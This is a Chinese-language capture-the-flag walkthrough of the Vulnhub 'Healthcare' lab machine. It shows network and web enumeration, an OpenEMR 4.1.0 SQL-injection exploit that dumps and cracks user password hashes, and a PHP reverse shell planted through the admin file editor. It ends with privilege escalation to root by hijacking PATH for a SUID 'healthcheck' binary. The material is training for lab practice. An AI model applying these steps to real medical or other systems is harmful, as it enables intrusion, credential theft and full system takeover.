主頁 >  其他 > Vulnhub之Healthcare靶機詳細測驗程序

Vulnhub之Healthcare靶機詳細測驗程序

2023-04-23 07:34:19 其他

Healthcare

作者: jason huawen

靶機資訊

名稱:

地址:

識別目標主機IP地址

─(kali?kali)-[~/Vulnhub/Healthcare]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.254  08:00:27:f6:d1:32      1      60  PCS Systemtechnik GmbH            

利用Kali Linux的netdiscover工具識別目標主機的IP地址為192.168.56.254

NMAP掃描

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-title: Coming Soon 2
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

NMAP掃描結果表明目標主機有2個開放埠:21(ftp)、80(http)

獲得Shell

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]
Name (192.168.56.254:kali): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
                                                                                                                              
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit ProFTPD                                       
-----------------------------------------------------------------
  1. FTP不允許匿名訪問

  2. FTP服務為ProFTPD,可能存在mod_copy漏洞

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ curl http://192.168.56.254/robots.txt
# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /

robots.txt存在/admin/條目,但是訪問該目錄,卻回傳頁面不存在的錯誤,

──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ nikto -h http://192.168.56.254       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-21 22:08:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
+ Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan  6 01:21:38 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ "robots.txt" contains 8 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 9543 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-04-21 22:09:10 (GMT-4) (57 seconds)
---------------------------------------------------------------------------

nikto掃描結果認為存在shellcode漏洞,查詢得到漏洞利用代碼:

https://www.exploit-db.com/exploits/34900

但是該代碼并不能正常作業,只能另外尋找突破口,

接下來掃描一下目錄:

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              js,html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2023/04/21 22:56:51 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]
/index.html           (Status: 200) [Size: 5031]
/index                (Status: 200) [Size: 5031]
/.html                (Status: 403) [Size: 1000]
/css                  (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]
/js                   (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]
/vendor               (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/robots.txt           (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]
/gitweb               (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]
/.html                (Status: 403) [Size: 1000]
/phpMyAdmin           (Status: 403) [Size: 59]
/server-status        (Status: 403) [Size: 1000]
/server-info          (Status: 403) [Size: 1000]
/openemr              (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]

掃描出/openemr目錄,其他目錄沒有什么價值,

訪問該目錄,可知CMS為OpenEMR, 版本為4.1.0,查詢是否存在相關漏洞

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit openEMR 4.1.0
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 4.1.0 - 'u' SQL Injection                                                           | php/webapps/49742.py
Openemr-4.1.0 - SQL Injection                                                               | php/webapps/17998.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ searchsploit -m php/webapps/49742.py 
  Exploit: OpenEMR 4.1.0 - 'u' SQL Injection
      URL: https://www.exploit-db.com/exploits/49742
     Path: /usr/share/exploitdb/exploits/php/webapps/49742.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Healthcare/49742.py

將漏洞利用代碼拷貝至作業目錄,執行該代碼

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ python 49742.py                                                                      

   ____                   ________  _______     __ __   ___ ____
  / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \
 / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
/ /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/
    /_/
    ____  ___           __   _____ ____    __    _
   / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)
  / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /
 / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike

[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d   

利用在線網站解密:

https://md5decrypt.net/en/Sha1/#answer

得到admin的密碼為ackbar, 另外一個用戶密碼為medical

登錄:

http://192.168.56.254/openemr/

在administration欄目中,可以Edit file,看是否可以將shell.php代碼增加到其中一個檔案,比如:statement.inc.php,而且可以看到完整的路徑,將shell.php代碼拷貝增加到statement.inc.php后,訪問該檔案:

http://192.168.56.254/openemr/sites/default/statement.inc.php

從而在Kali Linux上得到reverse shell

┌──(kali?kali)-[~/Vulnhub/Healthcare]
└─$ sudo nc -nlvp 5555                  
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
 20:50:43 up  1:55,  0 users,  load average: 1.00, 1.28, 3.57
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd /home
cd /home
bash-4.1$ ls -alh
ls -alh
total 20K
drwxr-xr-x  5 root     root     4.0K Jul 29  2020 .
drwxr-xr-x 21 root     root     4.0K Apr 21 18:54 ..
drwxr-xr-x 27 almirant almirant 4.0K Jul 29  2020 almirant
drwxr-xr-x 31 medical  medical  4.0K Nov  5  2011 medical
drwxr-xr-x  3 root     root     4.0K Nov  4  2011 mysql

bash-4.1$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e

從而得到了user flag

提權

看能否用前面得到的密碼切換shell到medical

bash-4.1$ su - medical
su - medical
Password: medical

[medical@localhost ~]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)

我們的猜測是正確的

[medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null

/usr/bin/healthcheck有SUID位

[medical@localhost backups]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

可以看到healthcheck會執行ifconfig,因此可以生成我們的ifconfig命令,從而實作提權

cd /tmp
[medical@localhost tmp]$ echo '/bin/bash' > ifconfig
echo '/bin/bash' > ifconfig
[medical@localhost tmp]$ chmod 777 ifconfig
chmod 777 ifconfig
[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 920K
drwxr-x--- 20 root root 4.0K Jul 29  2020 ./
drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../
-rw-------  1 root root  426 Jul 29  2020 .bash_history
-rw-r--r--  1 root root  193 Sep 24  2011 .bash_profile
-rw-rw-rw-  1 root root  422 Sep  6  2011 .bashrc
drwxr-xr-x  2 root root 4.0K Sep 12  2011 .cache/
drwx------  6 root root 4.0K Sep 12  2011 .config/
drwx------  3 root root 4.0K Jul 19  2011 .dbus/
drwxr--r--  2 root root 4.0K Jul 19  2011 Desktop/
-rw-------  1 root root   28 Jul 22  2011 .dmrc
drwx------  3 root root 4.0K Sep  8  2011 Documents/
drwx------  2 root root 4.0K Sep  6  2011 drakx/
drwx------  4 root root 4.0K Sep 24  2011 .gconf/
drwx------  2 root root 4.0K Sep 24  2011 .gconfd/
drwx------  3 root root 4.0K Sep 12  2011 .gnome2/
drwx------  2 root root 4.0K Sep 12  2011 .gnome2_private/
drwx------  3 root root 4.0K Jul 29  2020 .gnupg/
drwx------  2 root root 4.0K Jul 19  2011 .gvfs/
-rwxr-xr-x  1 root root 5.7K Jul 29  2020 healthcheck*
-rw-r--r--  1 root root  182 Jul 29  2020 healthcheck.c
-rw-------  1 root root    0 Sep 11  2011 .ICEauthority
drwx------  3 root root 4.0K Sep  6  2011 .local/
drwx------  3 root root 4.0K Nov  5  2011 .mc/
-rw-r--r--  1 root root    0 Oct 22  2010 .mdk-menu-migrated
-rw-r--r--  1 root root    0 Jul 21  2011 .menu-updates.stamp
-rw-------  1 root root    6 Jul 29  2020 .mysql_history
-rw-rw-rw-  1 root root 2.1K Jul 29  2020 root.txt
-rw-r--r--  1 root root 797K Apr 12  2020 sudo.rpm
drwx------  2 root root 4.0K Nov  5  2011 .synaptic/
drwx------  2 root root 4.0K Sep 11  2011 .thumbnails/
drwx------  2 root root 4.0K Apr 21 18:54 tmp/
drwxr-xr-x  2 root root 4.0K Jul 29  2020 .xauth/
-rw-r--r--  1 root root 1.9K Jul  6  2011 .xbindkeysrc
[root@localhost root]# cat root.txt
cat root.txt
██?   ██? ██████? ██?   ██?    ████████?██████? ██?███████?██████?     ██?  ██? █████? ██████? ██████? ███████?██████? ██?
?██? ██??██????██?██?   ██?    ???██????██???██?██?██??????██???██?    ██?  ██?██???██?██???██?██???██?██??????██???██?██?
 ?████?? ██?   ██?██?   ██?       ██?   ██████??██?█████?  ██?  ██?    ███████?███████?██████??██?  ██?█████?  ██████??██?
  ?██??  ██?   ██?██?   ██?       ██?   ██???██?██?██????  ██?  ██?    ██???██?██???██?██???██?██?  ██?██????  ██???██????
   ██?   ?██████???██████??       ██?   ██?  ██?██?███████?██████??    ██?  ██?██?  ██?██?  ██?██████??███████?██?  ██?██?
   ???    ???????  ???????        ???   ???  ?????????????????????     ???  ??????  ??????  ?????????? ???????????  ??????
                                                                                                                          
Thanks for Playing!

Follow me at: http://v1n1v131r4.com


root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b
 
[root@localhost root]# 

至此成功得到了root shell和root flag.

經驗教訓

  1. 在nikto結果得知目標可能存在shellshock后,就認定可以利用漏洞,而忽略對于web應用的正常步驟,即掃描目錄,而且需要足夠的耐心才能得到相應的目錄,否則該靶機將無解,
STRIVE FOR PROGRESS,NOT FOR PERFECTION

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550861.html

標籤:其他

上一篇:Vulnhub之Hacker Fest 2019靶機詳細測驗程序

下一篇:返回列表

標籤雲
其他(157858) Python(38092) JavaScript(25381) Java(17985) C(15215) 區塊鏈(8256) C#(7972) AI(7469) 爪哇(7425) MySQL(7137) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4557) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2430) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1959) Web開發(1951) HtmlCss(1919) python-3.x(1918) 弹簧靴(1913) C++(1910) xml(1889) PostgreSQL(1872) .NETCore(1854) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • Vulnhub之Healthcare靶機詳細測驗程序

    Healthcare 作者: jason huawen 靶機資訊 名稱: 地址: 識別目標主機IP地址 ─(kali?kali)-[~/Vulnhub/Healthcare] └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24 Currently scan ......

    uj5u.com 2023-04-23 07:34:19 more
  • Vulnhub之Hacker Fest 2019靶機詳細測驗程序

    HF 2019 作者:jason huawen 靶機資訊 名稱:Hacker Fest: 2019 地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 識別目標主機IP地址 將虛擬機鏡像匯入到VirtualBox中,并設定網路模式為host ......

    uj5u.com 2023-04-23 07:34:14 more
  • toml格式組態檔介紹

    toml官方wik toml官方檔案 此次檔案是以v1.0.0為例,進行說明的。如果使用到的版本不同,直接去官方檔案中找對應的版本即可。 談到組態檔,大家都能說出來好幾種,比如常見的ini、xml、json、yaml、properties、toml等等,因為專案中用到了toml格式的組態檔,但是 ......

    uj5u.com 2023-04-22 07:45:22 more
  • 【ZeroMQ】zguide 第一章 部分翻譯

    為了更好的閱讀體驗,請點擊這里 本文大部分內容翻譯自 Chapter 1 - Basics,原因是之前翻譯的版本太老了,不得不親自披掛上陣~~拿機器翻譯一下~~。只截取了部分自己可能用得到的,所以如果有看不太懂的地方,去翻一下原網頁吧。QWQ 附贈 libzmq 的 api 介面函式說明 一份。 一 ......

    uj5u.com 2023-04-22 07:45:15 more
  • 更好地提問ChatGPT_常用prompt表

    類別目的提問方式要點 文案寫作 周報、日報、年終總結 本周我做了以下幾件事情:出差客戶辦事處、交流演示、初步資料分析。請幫我寫一份周報 要點形式列舉作業內容。可以說明職位,以便作業內容更貼合實際情況 郵件 我是某專案的專案經歷,請寫一份作業郵件,來詢問研發小組開發進度,同時邀請參加階段匯報會議 說明 ......

    uj5u.com 2023-04-22 07:45:08 more
  • 物聯網常見協議之Amqp協議及使用場景決議

    摘要:本文圍繞AMQP協議,為大家詳細決議AMQP協議、核心技術亮點、多協議之間的對比以及使用實踐。 本文分享自華為云社區《物聯網常見協議之Amqp協議及使用場景決議》,作者:張儉。 引言 本文圍繞AMQP協議,為大家詳細決議AMQP協議、核心技術亮點、多協議之間的對比以及使用實踐,并介紹華為云Io ......

    uj5u.com 2023-04-22 07:44:54 more
  • 10萬字干貨:《數字業務連續性提升最佳實踐》免費領取|TakinTalks社

    一分鐘精華速覽 首刊限版400本,沒有電子版下載。 100本作為社區福利,免費領取,領完即止!不加印。 為什么會有這本刊物? TakinTalks社區是由業內專家共同發起的、專注業務穩定性提升的技術交流平臺。面向技術管理者和一線從業者,定期探討行業前沿的技術,分享最新的、可參考的、可落地的實戰經驗。 ......

    uj5u.com 2023-04-22 07:44:13 more
  • Excel的列數如何用數字表示?

    本文介紹在Excel表格檔案中,用數字而非字母來表示列號的方法。 在日常生活、作業中,我們不免經常使用各種、各類Excel表格檔案;而在Excel表格檔案中,微軟Office是默認用數字表示行數,用字母表示列數的,如下圖所示: 而這樣就帶來一個問題:當一個Excel表格檔案的列數相對較多時(比如有幾 ......

    uj5u.com 2023-04-22 07:43:43 more
  • 【GPT開發】人人都能用ChatGPT4.0做Avatar虛擬人直播

    0 前言 最近朋友圈以及身邊很多朋友都在研究GPT開發,做了各種各樣的小工具小Demo,AI工具用起來是真的香!在他們的影響下,我也繼續搗鼓GPT Demo,希望更多的開發者加入一起多多交流。 上一篇結合即時通 IM SDK搗鼓了一個Demo ChatGPT群聊機器人Demo ,也收到了一些還不錯的 ......

    uj5u.com 2023-04-22 07:43:13 more
  • What...MiniGPT-4居然開源了,提前感受 GPT-4 的影像對話能力!

    說在前面的話: 一個月前,OpenAI向外界展示了GPT-4如何通過手繪草圖直接生成網站,令當時的觀眾瞠目結舌。 在GPT-4發布會之后,相信大家對ChatGPT的對話能力已有所了解。圈內的朋友們應該已經親身體驗過無論是文本生成、撰寫代碼,還是背景關系關聯對話能力,這些功能都一次又一次地震撼著我們。 ......

    uj5u.com 2023-04-22 07:42:46 more